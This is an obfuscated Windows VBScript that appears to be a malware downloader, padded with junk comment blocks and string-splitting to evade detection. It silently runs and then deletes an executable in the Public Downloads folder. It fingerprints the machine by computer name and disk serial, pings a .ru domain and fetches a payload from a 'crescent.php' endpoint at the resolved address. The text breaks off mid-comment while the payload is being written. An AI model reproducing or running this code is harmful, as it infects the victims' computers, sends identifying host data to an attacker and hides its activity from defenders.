

On Error Resume Next
 
'for DrJvHMMnwRPNnQnwEKsZ = 19 to 163
'SgijEOyY = RTrim("dhCoMJnAazPoSMMw")
'if DZnPelKbMDyOPj = 14 then JjGOykuWsy = "sQXr"
'Next

Set qyvIsHyBmePqgn    = CreateObject("wscript.Shell")
 
'UErRHClgoLQDfxKCEuayQFaI = Len("YXOKbpNVnETYpnixSVoKURiXIUNy")

dKhESGzH = qyvIsHyBmePqgn.Run("ipconfig /flushdns", 0, false)
 
'if qpprEDZ = 19 then JSIlZpgfGGHVhesmzbqgTFt = "kDCoWCnbCbSpMhyKWAWI"

XzGmfqh   = qyvIsHyBmePqgn.ExpandEnvironmentStrings("%PUBLIC%")
 
'for qFlfaZiZX = 108 to 241
'UKtMgeRToiuJXEEiWVfyBp = RTrim("XFEctLFefccAfpSoErXQhhgarDMuZsfNQQIZMquWoesbbiqgMKxxYMO")
'Next

FeAwWi = qyvIsHyBmePqgn.ExpandEnvironmentStrings("%" & "S" & "Y" & "S" & "T" & "E" & "M" & "D" & "R" & "I" & "V" & "E" & "%") 
 
'jEEXe = Len("EeMybzSiiBXkKAUeddScpsPagMOtsKrdx")

PqnBDshLyJg    = qyvIsHyBmePqgn.ExpandEnvironmentStrings("%C" & "OM" & "PU" & "TE" & "RN" & "AM" & "E%")
 
'for tqSskNJgjJ = 17 to 173
'VvNmjPYwvY = Trim("WwppoVXgLDmOIjUnZgfbDtpMEouVqkqioZVoXTsNmhKrbYbfDIVsg")
'Next

Set GSrJkcXoOyT = GetObject("win" & "mgm" & "ts:" & "\\." & "\ro" & "ot\" & "cim" & "v2")
 
'If thuhtmlrkeWysRXsQE = 41 Then 
'mTtIsGlMjI = Trim("LXXMKOXHkiwoYzttNGMrEKLHKDZjuLIgujfsvpvVpoTiuFUwBvUGuxq")
'for ZKjDxYLFMhXdwwpURlWJAow = 109 to 239
'itEAiCvGiBTU = RTrim("QVwOMkAOhnffLZuukNOUDTKWKmQvudUXpvGnDakjheWNDWkhn")
'Next
'elseIf OCMxUyVXu = 34 then 
'CeyTOhUwuoytmaRz = Asc("LXXMKOXHkiwoYzttNGMrEKLHKDZjuLIgujfsvpvVpoTiuFUwBvUGuxq")
'for MphKJcdWLPcKSvwfUOgPYe = 32 to 193
'VMzOHP = RTrim("gJFRJFJeOoRPKNeBWIiUbXVimMxKNVGoefeIpeWPFBBkMnKyVMlGoQVIn")
'xIzRthdlfjVMrmSP = LTrim("WlVzBypAjAAOKVUSzZHFkICjBfPzAuUVAum")
'for fvKJQ = 32 to 203
'hcWVNAtr = RTrim("qOilxWipzogfNPjSQUd")
'Next
'Next
'elseIf CbHZBiZQUmvxYX = "pUBxXKqCQqcNFidizrCmxsegfmoh" then 
'JkkovpdZQPpTMUPlgVaSwn = Lcase("LXXMKOXHkiwoYzttNGMrEKLHKDZjuLIgujfsvpvVpoTiuFUwBvUGuxq")
'elseIf AwZCtv = 11 then 
'zVRGkCqcEjYCqK = 132
'dDrPXqcyftthjKEgAwtCqN = LTrim("PQSHjDIeaBrQPsNNoQoosxmMvGtOIIX")
'for gbyEjtuWOTf = 80 to 212
'uoomjEmCZeRdFLcJtWRemA = RTrim("IEXtRdeHTBREcZDkBqBKUyXQ")
'Next
'zVRGkCqcEjYCqK = zVRGkCqcEjYCqK + 18
'End if

For Each mJVZWL In GSrJkcXoOyT.ExecQuery("SEL" & "ECT" & " Na" & "me " & "FRO" & "M W" & "in3" & "2_P" & "roc" & "ess" & " WH" & "ERE" & " Na" & "me=" + "'decrepit.e" & "xe'")
 
'for kLhoKFFyxc = 23 to 183
'cHrjgTzFYpbXSffLMk = RTrim("ANvYOIJxWfrLOQPvewOl")
'If ZJnPJettNiCY = 14 Then 
'uwKRKpIBJkLDOPQ = Trim("FsgebVvDHKWAOgplwNVcqcEPirajmsOmZyVFnplbVhMFHgiloVxRlWJcoQw")
'for dSGvAZxjrX = 21 to 215
'QpYmnlp = Trim("nCfndtRBGExZugUilbnBrjWHNWStCWxhQOqQbHXgfhkTKrurRFANbMHDfXa")
'Next
'elseIf oApDhomkzzfDdSIJqo = 41 then 
'zTfEwyRPZcLuO = Asc("FsgebVvDHKWAOgplwNVcqcEPirajmsOmZyVFnplbVhMFHgiloVxRlWJcoQw")
'HiBLuiO = Len("NyWIUrxFbaEf")
'elseIf LZhNVuGKaRLKFYrb = "rorPAMpJuaFPAUyiZ" then 
'NauQO = Lcase("FsgebVvDHKWAOgplwNVcqcEPirajmsOmZyVFnplbVhMFHgiloVxRlWJcoQw")
'elseIf wtEPYMHn = 20 then 
'QaRsbw = 132
'for goolcpAt = 106 to 186
'ZUUdVIjYQRdiEMvXtPUKaVC = RTrim("HCQLXWVDaGRioZZFKTbbbbtNiagiUDRYZaAhHFtGNBlpGLaulVKjTcT")
'Next
'QaRsbw = QaRsbw + 21
'End if
'Next

  mJVZWL.Terminate
 
'ddgtblOCBjLplH = Len("gietZDlDetBYrIUgfwexJsMHbPOGonWAbsOqKMsVsZBzZNXugCf")
  
Next
 
'RLaVnuifOKKbYRZACgMoxE = LTrim("wIpESVDdjuIemTJiYVdqZglJwTTXFupvNOeMypQKKhbhQmmhtxoSTOXQW")
'for zBgXoEM = 59 to 202
'XowjiFTfsFE = Trim("meHGXcyrOqSiRJeKmcEVOsxOFMzieLSnxSOBPihjS")
'Next

Set jTMOVmPDMwIQC = CreateObject("Scripting.FileSystemObject")
 
'for pxwlmiQKhecyZIYX = 45 to 241
'OAPtJJpjaJJdI = Trim("rfYklTTDNzImqqQOrKDmUjgnH")
'Next

JneRTuQ = XzGmfqh+"\" & "D" & "o" & "w" & "n" & "l" & "o" & "a" & "d" & "s" & "\"+"decrepit.e" & "xe" 
 
'for uwfaLfI = 31 to 304
'nOEZIGHD = Trim("KdfLwaTZlZePKCo")
'Next

If jTMOVmPDMwIQC.FileExists(JneRTuQ) Then 
 
'DoxiZCZfPCzwxUCSncKXf = Len("iyQNrximBzHwBnzozbpFUxrJZ")

			If jTMOVmPDMwIQC.GetFile(JneRTuQ).size > 9350  Then 
			 
'CfGpKjPiAWmQOIqwrUYxr = LTrim("GQbPmqTtKYjkuxuKeQDfSc")
'for TSFoOmOezpZp = 63 to 161
'uxYOHLOheN = RTrim("pIuLueZIwUkfeXJEkFYEwkTeRLRclpEMngxGknvuQG")
'if njcoEctIUxlFpPuj = 21 then wWHPYrxaDU = "doqmpqhi"
'Next

			WyTjCzzCLgJVf = qyvIsHyBmePqgn.Run (JneRTuQ,0,false)
			 
'if kPgrAciHrExEsL = 21 then txIPc = "SZCUaYv"

			wscript.sleep 9921
			 
'for kGdItBrluqAoJCZrjR = 50 to 183
'BHpdkcKlQrSbh = RTrim("WziMYNddeennEPnRsqkavdtgjQbtcOTEjPDsBFwneMyFoXg")
'for AiqzAr = 97 to 202
'GBdHmjAPKiDoMuQnuwvjen = RTrim("apcfcFjYKmAboBvLivFTsoJkvwCEIOTKRYLuYjidUQBI")
'Next
'Next

			jTMOVmPDMwIQC.deletefile(JneRTuQ)
			 
'puZfd = LTrim("QjkQmGzLBJbhKtgCCFzVwPhQajIxMgQUcyJSEoMexUIjoRTeUms")
'HvBBTpCxCyUsGFMjO = Len("NtUYbHybJPecZownUCIQkyJhvVnqiLHuGoeaMjTuDsgnSZZgvSlKbxNOjm")

			End if
 
'for mQtjrhTHkVXaV = 6 to 219
'YGTeBy = Trim("ULTPpfcvqUFbTbMVqnCbrGwqNoCaAzgSXhYYYSdcIagG")
'Next
			
End if
 
'iXTsnVRkoKJvRcAGfpT = LTrim("aTcTLoBbUboZCQSEhCDSVTxseBGhZMljWxKPv")
'for zTqPNVjtAJvZdmAHH = 25 to 248
'koKhTBIqEDEGD = RTrim("DyfDkWvIFXemHxVqDtLMVRAoGXQfou")
'Next

Set BiIOoMVrNH = CreateObject("wscript.Shell")
 
'for bjsPADBBBgwtZLYvT = 64 to 300
'TTFWqSOctkpqlYalKFQgZn = Trim("czKMvzMJoxKZEsaAXKQLKvXToATfmUfX")
'Next

WjiqUw vmIkn()  
 
'for eIwHMfj = 100 to 185
'ywDcvHpGTCstmhqN = RTrim("vJdKcEzihjuQArh")
'Next

Function vmIkn()
 
'if axEiDsdvi = 15 then glPAfHbDNOsMXCzkubdCL = "GIREqjcqrsgQmrVsdQyrjSOZCiTy"

On Error Resume Next
 
'for NByzideZfeGKRu = 39 to 165
'PWaaTStRuXUxWBcDGj = RTrim("nMKuDZGjQEXzKllqDUHTjEcOgIXDazaporcJPfPsmieSxyLPqN")
'for UmHjkwOvBD = 55 to 188
'QdhLSJca = RTrim("hAaJRiwIMNwLVBktZTRUqjaO")
'Next
'Next

   Set apiUjulJxZlruo = CreateObject("MSXML2.XMLHTTP")
    
'for lustUCQvNFgESUOc = 30 to 258
'uRyyRu = RTrim("rckovmtLAbEzLrGIQEJHMFKDDnfHeTzfHYLoLYJtKGTnXFiZrqApCdi")
'Next

   Set yMERvpouFNZUqGeeRRv = CreateObject("Scripting.FileSystemObject")
    
'fnBmZamLzNwtZ = LTrim("IvmgcytAnEAWrNRvNvGwREtdXgALgjHNqvKPqwNbcfAwlCiYuEAAn")
'EBJJwyhTDxnfwCC = LTrim("QheTmDxrUxbRcj")
'for NTGNgnRduLxzyXl = 39 to 270
'rzjSIJpAERoyW = RTrim("qNRcwoYcQBYaGxtxMGadznREeFJOz")
'Next

   Set LNSYpBJcUURWF = CreateObject("wscript.Shell")
    
'for cGtkbHyGVufoCxaCvyHoJkI = 6 to 235
'kuzolUbNlpRclrrORwkFptS = Trim("ClHrmryyAhHKVBSSCMfxREHtWNACGqbxUqRqFuCZenqKGHbjnXqFWWe")
'Next

 
   PqnBDshLyJg = LNSYpBJcUURWF.ExpandEnvironmentStrings("%C" & "OM" & "PU" & "TE" & "RN" & "AM" & "E%")
    
'qZciivgFv = Len("vzKLhvRDAlhcFnZgJKjjrTQQVjh")

   KHzeRoLjRk = Hex(yMERvpouFNZUqGeeRRv.GetDrive(FeAwWi).SerialNumber)
    
'if TEqlJwIcmsIa = 19 then JjnGQrOivKVeVPjKhTMPbrc = "KsAZzdMleSzGjiWfk"

   iIAjRKnZBBkEecDtNKsF = PqnBDshLyJg & "_" & KHzeRoLjRk 
    
'SXXKbHvDQaJAsHGcWR = Len("bMLNvkoOGoGbexYgFiomBAdsShwswsJTSPtV")

   OwfYSG = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0::" + iIAjRKnZBBkEecDtNKsF + ":" & ":" & "/" & "." + "culprit/."
    
'HOyJLOjSCtYVsPknpSmoPNm = LTrim("abkVqQyRBFlUgQOUjbLuYxVPDVZlPlfubIjkeNcmvGUmdQGZESE")
'for rScGU = 32 to 206
'VrMBQZrsYhdq = RTrim("zRcilmOAhxhrsjpGeJvGviFDMmYisabhoc")
'if AXjfG = 14 then fDjizIiazgaseRMYVzOgI = "zDProGHaPAECBU"
'Next

   Set hYLHjLFROJrnywZFg = GetObject("wi" & "nm" & "gm" & "ts" & ":{" & "im" & "pe" & "rs" & "on" & "at" & "io" & "nL" & "ev" & "el" & "=i" & "mp" & "er" & "so" & "na" & "te" & "}/" & "/" + PqnBDshLyJg + "/ro" & "ot/" & "cim" & "v2").ExecQuery("SELECT * FROM Win32_PingStatus WHERE Address = 'gorrita.ru'") 
    
'if efdkNtajxMGvZ = 20 then kTcmDRLUTxvTuUazWh = "jmbzeZRbCOnBNOTYZkEeJKMgot"

   For Each nImElaAemFTrI In hYLHjLFROJrnywZFg
     
'TEYOwiQVf = LTrim("caeasGXunSGGYCwsuZWySXCpPNguyXPfWcKCiJgUXQxIENfWRDoqyheF")
'KeZcvPDbjvstKksCbBZu = LTrim("ChKcvjYgoyFfuzCuuUiFddkeYtDyvGdfcCIwPzAgeuuxnN")
'qIggroIZxgEBfakiUZC = Len("rFeuUBbiinqKdRHnawonuizjvyADJMcNLYuldlLpNZqJpuYOTwI")

    If nImElaAemFTrI.StatusCode = 0 Then
	    
'for ssGFLRsbE = 53 to 191
'qXSspUy = RTrim("KvbNbsOzlgfXAWNNoiOSZOCtgrPuFEFCSBBwRtdSDspYcSXwf")
'PXQQvshgjdTuhacFy = LTrim("QwuEvOgZeROUTPdYpeClGEjMupkyI")
'if NYbPflLcCkVOQROJEQJlxCNO = 13 then MiKFehQgR = "sAymdCABkpTufggizLCKLNCSDBX"
'Next

       XRbNAGqUdgePQqZLnngiQ = "htt" & "p:/" & "/" +  nImElaAemFTrI.Properties_.Item("ProtocolAddress")  + "/crescent.php"
	    
'for lRCHEnDSzxapvrpgTZj = 4 to 201
'RGVlDmizGyrRC = Trim("DLBuzdswLPklhxWzHKTevQDREDMAGJnthpcIXpYoOZZnCxSIcrJshfDmHjp")
'Next

       With apiUjulJxZlruo
	       
'WjWLMsaoOQrGBO = LTrim("vrUhJMTbDidCGfNnSJHunVECOKPKyHoKmDuIURTLDH")
'jqTIAcYxtUtZnRTz = Len("IdwtSPCkETBqwqfCbTYqGJVjrRSJUVCyTPudWjQaRYvIXHxdOWLxvIpy")

		 .Open "G" & "E" & "T", XRbNAGqUdgePQqZLnngiQ , False
		    
'for KnTBbCVrzDGkG = 14 to 190
'KEcTMZIOhUbolfUaJieT = Trim("hfhaKTeCMMkCvhnnHOwFyZmQpWYtXFmgDZvoezx")
'Next

         .SetRequestHeader "U" & "s" & "e" & "r" & "-" & "A" & "g" & "e" & "n" & "t", OwfYSG
		   
'for gLKOM = 36 to 264
'gXbjhTBunwMPJASmHDxdCGXm = RTrim("yywhCXpONDXrlxbyCwsGz")
'Next

         .send
		   
'If sakoun = 21 Then 
'ODyetfHnmB = Trim("ZiRaRDHkKGumOmtua")
'for KskCRTLTlzbiLKqnlgf = 52 to 177
'jHJqTVQNRzq = RTrim("nRfaEOZyYQOQlheZbEoVBCiuiwCxCmJrP")
'for ZIKbQrkjscDjj = 69 to 169
'sYlvyWlilsILcwlHXB = RTrim("QQcXeQTqSfMTOKO")
'RRlqWRTFOnxkEClYdbHIYTF = LTrim("sTNvrOmXkcjgZOuzJSPdVFNdavk")
'for OXxLTyD = 39 to 231
'YNzBaA = Trim("zPhIzFDcwmFkVwd")
'Next
'Next
'Next
'elseIf NeKTwFCTSfyxMuoryoY = 35 then 
'ZzsUgN = Asc("ZiRaRDHkKGumOmtua")
'If aVynRa = 38 Then 
'OPNDstX = Trim("xtQlljHcQImO")
'if UcoMUjiPxJyCgcOqcFJSOy = 15 then CsYyluRiDyDTwXDxZXjrs = "sPTdjJMdeV"
'elseIf HBmNoaAdHcENchnQZu = 33 then 
'ytgqIFccp = Asc("xtQlljHcQImO")
'If iBpbNLRUKOGBLKBcizO = 25 Then 
'xrQBdExBDjFKIgqGvTRvg = Trim("orhEctMBUGhTmlz")
'if PQpLmttZmZDEPOZPok = 20 then jJEtqw = "OhC"
'elseIf SScQFYXOmYjT = 18 then 
'rknxJOPRaIvseUvhOiTJ = Asc("orhEctMBUGhTmlz")
'for qoQcjibjUDTNCMdBwAiKeC = 37 to 293
'nZgrN = Trim("BxusXjpxlEvpWrJwCSrhrBX")
'Next
'elseIf ZyZMzZdowhbpryVH = "FIyCwhuLZcmkFhProbyikSOFcKIrG" then 
'IhQCrJgYaEcgY = Lcase("orhEctMBUGhTmlz")
'elseIf QKKRmOkJplcdbUDnVZar = 22 then 
'lsbiosoZUBIYsLf = 191
'for kGluur = 33 to 288
'EhZtpiMZZoERhaJhoSCS = Trim("SpcOVKWICOuIxVVuGiKchuJxeaZxc")
'Next
'lsbiosoZUBIYsLf = lsbiosoZUBIYsLf + 12
'End if
'elseIf kuABfqRTyVd = "aBdaGZwdRnCrXS" then 
'sqLMNdgbwdyhZo = Lcase("xtQlljHcQImO")
'elseIf LeIMxLMXiDLxrWx = 22 then 
'YiYAqfvrzvNTGwS = 325
'for HedxAsIsS = 7 to 204
'lfZTXiXsbPDdXJdux = RTrim("tzAvCikQfLnvihoExPLMGmYcIe")
'If TFuEuBoleeQp = 49 Then 
'GNPcHupUZxhslKGaYnYaQwZQ = Trim("ezmJTXFYxJClPNiViCeYoKKXapiVQZphuiNUyYmTRJHC")
'JYmuFinTHhZcUZWrZ = Len("qfUxWWWdzgVwPwhCZRjxDaTDGs")
'elseIf AhtCaSzVOzYJAAjSzu = 24 then 
'NLJqhLF = Asc("ezmJTXFYxJClPNiViCeYoKKXapiVQZphuiNUyYmTRJHC")
'If hsBrISBtrNQUZarMEv = 11 Then 
'gtdGaVLjfctVXBp = Trim("ALmRScNJNqWnDaIVPKYVOOnsSWnJwNpmVIPPdk")
'for WsNjtxYcdLFsTRBMARpHG = 59 to 325
'xyGMnsyBfeDL = Trim("rLgpgyMmJywpqGwrXkCvPcgK")
'Next
'elseIf qFGCzaBanonCmYzNuDgoEm = 44 then 
'WwiWQxrtSjgAHxs = Asc("ALmRScNJNqWnDaIVPKYVOOnsSWnJwNpmVIPPdk")
'If WfKUp = 19 Then 
'htyqiFKhKCfSUc = Trim("SaUjZxAJIUvGYxHBmZhFNjltClSeC")
'if SiHPwnkDdMBbwCEEu = 17 then TxzGSailtbcggkTJW = "loVZPUGnJmOHlantBhMQhhKuI"
'elseIf hypIijKwtaoJY = 22 then 
'FBcYSWOwrEZPInxjMBgfphVL = Asc("SaUjZxAJIUvGYxHBmZhFNjltClSeC")
'for aVAziaYRuwcxaE = 2 to 204
'ILPojqnaqLVYBEPVHuOkQY = RTrim("RoyuodkDQvSMcFgnvKoNCXNfaVCLTdkKSuRBpgChlUlIwJfphxVNMj")
'for bSUTaYkmLHthneyPIGchlEj = 32 to 170
'pNdWIWyjCWa = RTrim("GMkyxoQxBDyGFFHJJWjDeNvOeoIKeQEcCZAPxmHuAr")
'If XBQtbtNDnIDsRWU = 26 Then 
'gFSlyWDg = Trim("rofAdiXjOVpOlIIboUpDBxFKUJCOWsdTVJyHFXtQe")
'for ofGUDgd = 24 to 247
'AkZqtuUvRLiFliQMYJR = Trim("yFflTDmYRjyMrCfAbekAWqLaVFOuvtPMPMmULIbQIstzHZrN")
'Next
'elseIf rMWPpCn = 36 then 
'UqcYP = Asc("rofAdiXjOVpOlIIboUpDBxFKUJCOWsdTVJyHFXtQe")
'If KcgsveZGsOcQQV = 33 Then 
'VcNwVjPjMfoLilTy = Trim("UrPRUcnqxFDhCKLVVVoDGpElMYuVJpqW")
'SwOidglHFGZVgMrOamxQ = Len("gUNeJlGzWHDrJZiKLlAGBgDXFiWgkrxUyxmbAETufIjyVdXnIDP")
'elseIf fENsFEjmliaprbMagxTB = 41 then 
'rousTM = Asc("UrPRUcnqxFDhCKLVVVoDGpElMYuVJpqW")
'if oHmKKfsgGsEomk = 15 then zCtHkrkwB = "wQeBiCNLEEAwzbYZUAtPPry"
'elseIf SqUYPok = "unulmk" then 
'InQYdKjAp = Lcase("UrPRUcnqxFDhCKLVVVoDGpElMYuVJpqW")
'elseIf VEbkCozxjnPSzlrcUvOBaC = 7 then 
'AStgvXtIoFyxIfhofZRFx = 314
'if uhAfAtPyetwYPprop = 17 then qkPtoBOoN = "wdJ"
'AStgvXtIoFyxIfhofZRFx = AStgvXtIoFyxIfhofZRFx + 15
'End if
'elseIf lDApuWHybRzOvYabBy = "cwInUeEYkrZlWSTcDoZETYetIcIl" then 
'njhqnxGQqwfsjQWhhx = Lcase("rofAdiXjOVpOlIIboUpDBxFKUJCOWsdTVJyHFXtQe")
'elseIf JKxtkFQbHObspdobz = 26 then 
'MMrnFQ = 418
'htvpNAII = LTrim("rNvYZcEVeEViLxlPMsFxyeIteZRxWWg")
'for sjOivJSFKsYFbVwKaBIDKXME = 12 to 181
'tzLHz = RTrim("iTNWgQimsnmkoDDUmwVYjpUWJhBKHxLkAXsCintkZQR")
'for TNqvqUDmyytyrNz = 68 to 176
'YfvbBkRKBl = Trim("zTXjvpTLOQcIyBYzDrZtVBkWIZjwftFVABzfVOwYgDJPS")
'Next
'Next
'MMrnFQ = MMrnFQ + 5
'End if
'Next
'Next
'elseIf oXwEQuw = "WdNytnrLEvScHSDlP" then 
'iFACtCGHlGkjSaWzJOm = Lcase("SaUjZxAJIUvGYxHBmZhFNjltClSeC")
'elseIf sJXgRRdzSsbKdcZ = 28 then 
'whSzaYEakcoOAxuCHU = 348
'ROKeCIWYUPYbABuePOUDh = LTrim("CcFjYJRuCoeUpMhiYKifgRWhA")
'for UswDVKCLiYTj = 45 to 314
'GZMjwfLiw = Trim("UBikFYjooxBGkJJnAzK")
'Next
'whSzaYEakcoOAxuCHU = whSzaYEakcoOAxuCHU + 6
'End if
'elseIf GsDSmhJxHdgbTUB = "OEqXyHdnFSaWfmp" then 
'EekGREldvuVTGXsPBcawB = Lcase("ALmRScNJNqWnDaIVPKYVOOnsSWnJwNpmVIPPdk")
'elseIf oomkPnQQZxhq = 26 then 
'cNmJCGZWrLprjlRZruEpkqv = 669
'for EUceLzzBdfDsgRcvu = 3 to 217
'bFHCT = Trim("UEOUldbaaAbeONQBXhnoxZnUFybYZCBbPefunIuZQ")
'Next
'cNmJCGZWrLprjlRZruEpkqv = cNmJCGZWrLprjlRZruEpkqv + 5
'End if
'elseIf rPhKnztGNvRyfhXWLiRYm = "rhzNWKQLGeDIMNQ" then 
'IQBSDWrrLrVaHGhpkJGu = Lcase("ezmJTXFYxJClPNiViCeYoKKXapiVQZphuiNUyYmTRJHC")
'elseIf WiwcfomfzthFC = 21 then 
'QIVwWPW = 309
'if EsaapTgBk = 15 then ZpxrUVfqJlQjgoLhQcG = "mBZZBThiuZ"
'QIVwWPW = QIVwWPW + 8
'End if
'Next
'YiYAqfvrzvNTGwS = YiYAqfvrzvNTGwS + 8
'End if
'elseIf mvAgDUuzktZefmbVhQ = "NCBSZg" then 
'mjFoIzN = Lcase("ZiRaRDHkKGumOmtua")
'elseIf NNmqmiXPXSyudRvExYJtQydK = 18 then 
'aayhGr = 741
'for ENZNrToPlgyWiaxlnFs = 29 to 199
'PvITBvYaJpMi = RTrim("JREQldvsTnwAXQIVaDoWJEFMvvNGwT")
'Next
'aayhGr = aayhGr + 8
'End if

       End With
	    
'If SjhMhAiXlFom = 36 Then 
'UvMiTTmxrYrgwSgaVA = Trim("eujcwJKZhwFWdQJjvtadjeucwEvADkyazvNxtpnWokCFpjwKP")
'for YFURoGJEhjUBctSpxr = 65 to 177
'GMXmKzalGAOGqn = Trim("aNtnHGhmOoLYYWiNWbYATKROVDDSdeOfpXOkxlzFqAvLPMieftTMZCb")
'Next
'elseIf PohLVuvgCQzowVG = 19 then 
'UMxnVXVbKpfkiBxPEMXumkqo = Asc("eujcwJKZhwFWdQJjvtadjeucwEvADkyazvNxtpnWokCFpjwKP")
'if STvCcqMljehXhehkGsIB = 15 then gIiebZXYZvEIKwSgQhcBT = "nBFFeRAvnxxlKMXBRo"
'elseIf mjhrkvKpSMOXNG = "XKUSjcZS" then 
'TGAfOKyBTjjjxLMjVJPio = Lcase("eujcwJKZhwFWdQJjvtadjeucwEvADkyazvNxtpnWokCFpjwKP")
'elseIf jauVvPpisrGfbgkLaMoi = 13 then 
'IBMNdGctNx = 175
'for vKliYO = 112 to 279
'KlHxaTgRuf = RTrim("ljLDKWHjxdVmROik")
'Next
'IBMNdGctNx = IBMNdGctNx + 8
'End if

       If apiUjulJxZlruo.Status = 200 Then
	       
'if JBkusxsy = 20 then ZyNfcppIcvtbJ = "UNd"

          vmIkn = apiUjulJxZlruo.ResponseBody
		   
'for dToJNc = 18 to 212
'HGzHbJntlglhZ = RTrim("jBjAJxcyTMNteae")
'Next

       End If
	    
'jZtGQaJotx = LTrim("EghPgQVWjsdWsyeLdSBpsWZvYUHoiUmTMvwIhfNxofo")
'CAHlOgW = Len("IpiGlrLJhnPFKKwCWdyFDANiDqWTzCToQbEFOBwoBoHrYQvsEFPl")

    End If
	 
'uKNaVfpulOyLMhrCdteh = Len("PfWWkBdgPnmdmTczqYXjSmBIgCRyakxGnCeeqEleLNVbLhZ")

   Next
End Function
 
'for XxczoiABdODugGqlfr = 9 to 264
'ZStBhNaPLDQrEgvihNgB = RTrim("fXjzrybpRGndQevvlOSpyMWzNkYIXyqnlWNexNjQkNylRCfDmSunjyx")
'Next

Sub WjiqUw(KQHmjanHlAvcCClMqUxhUNX)
On Error Resume Next
	 
'if NbcrSvgVQJlmUVWI = 19 then uMFQBbBFvNONwGUWo = "CLmphPRBThBihuWsMpMMAblWhRH"

  If Len(KQHmjanHlAvcCClMqUxhUNX)<>0 then
     
'if BRVwGoAkpRLcasNcDjovoKiD = 14 then ffwrQGsnbh = "iafYeSPRuUiMnEg"

    Set XMUkKbwtKbWtGwiCAEmROF = CreateObject("ADODB.Stream")
	 
'SpXFAzWTlsEyGVWEjjY = LTrim("dzzQgNQLToNlvCgVjyUJ")
'for YzOnOp = 44 to 177
'fUcBMJSqHZniKzw = RTrim("DpAVlOOYZaABs")
'if koUljisNecYhabD = 18 then TvkKAZKiNmnjsqF = "HZLbujULbVsMhoxVygGIpb"
'Next

    XMUkKbwtKbWtGwiCAEmROF.Open
	 
'If nEWCsilQPzT = 12 Then 
'JgaTmlJf = Trim("BjGLbevbKFiQtuoRpHHjRTmRgYOuVbbRfQXnRKaZbIzRQSR")
'for XyKWgHEi = 58 to 227
'gRQsy = Trim("fidQoPZzSfBPLyGGqNeempFIsmjf")
'Next
'elseIf jWjUpqRxxywnTIyhePvWE = 43 then 
'gUMxweeQH = Asc("BjGLbevbKFiQtuoRpHHjRTmRgYOuVbbRfQXnRKaZbIzRQSR")
'for HfIovH = 63 to 240
'wevtO = RTrim("YwBUkNnITpMWjVg")
'Next
'elseIf cbDimhDsTTRAXU = "BAehhHJUVBOGEsjUF" then 
'XblHVOJmYpOHrtnShqYL = Lcase("BjGLbevbKFiQtuoRpHHjRTmRgYOuVbbRfQXnRKaZbIzRQSR")
'elseIf EPvwMCDkugxsIZCtImJTof = 19 then 
'XaLygAjJyJxTLpLJLGBeJR = 955
'if wRIjOv = 16 then QcIhrZWwVU = "YPxTBAUBCSodIYpW"
'XaLygAjJyJxTLpLJLGBeJR = XaLygAjJyJxTLpLJLGBeJR + 8
'End if

    XMUkKbwtKbWtGwiCAEmROF.Type = 1
	 
'for JUELjsLrOoWxtxGoOic = 5 to 200
'sstCGsBhCHYwaSgDgrRfpti = RTrim("THxYyxzrsRbBFq")
'for pGQaWaQDHXQxIzKr = 38 to 173
'BZtkeIawj = RTrim("emaoKDbmRisqtQbgCjsHjrDRxuLxpdnABbdk")
'for xviEsTgD = 56 to 198
'NhuuzhIsnjJrQsdxouroS = RTrim("tmwYfyjktDxQvjoStjqBhRgCFHEZoOXZqDBNljMozYxNuMCEGZv")
'for pJbGtSXuKvefYaribhJWBBIU = 11 to 319
'IsFzSPTpbAtZ = Trim("pupcShWmKWfrmMwoAHnlaSurgL")
'Next
'Next
'Next
'Next

    XMUkKbwtKbWtGwiCAEmROF.Write (KQHmjanHlAvcCClMqUxhUNX)
	 
'If vJfUBkLiTZo = 28 Then 
'mNKFyptqkgOHIiw = Trim("PDBwGFDgbfHbqPahQksjkBPfwenZxzRRYDpSUMHLXQEvFkhl")
'if wiRJJCZCcXFxjpbHMeQIaf = 13 then wwhmHaaSzhDdWVpTLQuLvgX = "DudYLoURnUMcQ"
'elseIf PNuhaNjBuxuhFVbBFsSh = 25 then 
'FTwGShOvXLT = Asc("PDBwGFDgbfHbqPahQksjkBPfwenZxzRRYDpSUMHLXQEvFkhl")
'if IqaHXHyIHNGw = 15 then xnEoyyOvGKSYxAVltTJt = "JpRFJFXp"
'elseIf WSFfHzYdILAvLkOENCPP = "MUxTZMxBJGxRQxAaeyMgts" then 
'XKuxaIgVFW = Lcase("PDBwGFDgbfHbqPahQksjkBPfwenZxzRRYDpSUMHLXQEvFkhl")
'elseIf asjCVVxttEJtSBuhTJi = 23 then 
'wDZyILhhqsHCo = 883
'cBlZoEbMJqIdhheCdAb = LTrim("jsVcTiSyHbzlCVGYVCiJSltjdzgpOmfWpqCkgIGGmcEirWb")
'If FgaSRUyymzTBcjU = 28 Then 
'cvMSVsMwbXpgKrGYUNJGFEY = Trim("WGE" & "TslZMMiw")
'If DoBvoAJNjmdBCdxlYgJbb = 40 Then 
'atoDZsxfnNTOc = Trim("ajmDExvdJLYp")
'for emZYLSu = 41 to 301
'COBpFdDJZoVMWbcmLcuvDD = Trim("lWcgiNlVythQFkKnzC")
'Next
'elseIf EqIdXUoLsxwhHZfIahQfO = 33 then 
'GlaQPDyQ = Asc("ajmDExvdJLYp")
'if pzUSs = 13 then eNVJuxBZPEMVL = "bNU"
'elseIf oAFghYgEGiPArHrlXz = "NXZDGThmLeysosBOGHY" then 
'mmxwdwjWCGEkMcPI = Lcase("ajmDExvdJLYp")
'elseIf CtxktcKxzHPejfsEU = 17 then 
'vqDbkxBeyBxCXcyK = 942
'for OnadYvLoiuSDkqG = 14 to 200
'FzgQwaNIxCIqLcil = RTrim("JwsqsmgxhNqyznXI")
'Next
'vqDbkxBeyBxCXcyK = vqDbkxBeyBxCXcyK + 8
'End if
'elseIf EluJmEJtjmOaO = 36 then 
'FNUdrueRousvhOaOqYXqNj = Asc("WGE" & "TslZMMiw")
'itSOEApjNL = Len("KOPguMzXRnISGpHmCazQDESIdwckuovvBZiIKkjFnPzbab")
'elseIf CJWNwwXcgJaIwmbMdrnxzRrX = "MxcHUiDNTXRAyMRirlGVSPaeII" then 
'SVwqDYfVORUUgiVQRMlGGe = Lcase("WGE" & "TslZMMiw")
'elseIf PLtzamzlSzTdbbm = 7 then 
'lumhVHsxJShhFGQn = 469
'for ngBnhG = 3 to 164
'cLEhlVYmVjNJeRxlURURu = RTrim("AMgbwbEfKoenYkGYEBjHUsGmpuhWMoxbG")
'for YowpufiypnKNkKwNs = 57 to 177
